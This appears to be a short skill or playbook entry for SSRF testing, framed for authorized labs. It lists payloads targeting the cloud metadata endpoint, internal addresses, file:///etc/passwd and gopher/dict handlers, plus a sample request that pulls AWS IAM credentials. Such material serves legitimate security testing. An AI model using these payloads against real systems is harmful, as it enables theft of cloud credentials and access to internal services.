When to Use
- When conducting security assessments that involve performing ssrf vulnerability exploitation
- When following incident response procedures for related security events
- When performing scheduled security testing or auditing activities
- When validating security controls through hands-on testing
Prerequisites
- Familiarity with security operations concepts and tools
- Access to a test or lab environment for safe execution
- Python 3.8+ with required dependencies installed
- Appropriate authorization for any testing activities
Instructions
- Install dependencies:
pip install requests - Identify URL parameters in the target application that accept URLs or hostnames.
- Test SSRF payloads:
- Cloud metadata:
http://169.254.169.254/latest/meta-data/ - Internal services:
http://127.0.0.1:port/,http://10.0.0.1/ - Protocol handlers:
file:///etc/passwd,gopher://,dict:// - Bypass techniques: IP encoding, DNS rebinding, URL redirects
- Cloud metadata:
- Analyze responses for information disclosure or internal access confirmation.
- Generate a vulnerability assessment report.
# For authorized penetration testing and lab environments only
python scripts/agent.py --target-url https://app.example.com/fetch?url= --output ssrf_report.json
Examples
AWS Metadata SSRF
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
If the response contains AWS credentials (AccessKeyId, SecretAccessKey), SSRF is confirmed with critical impact.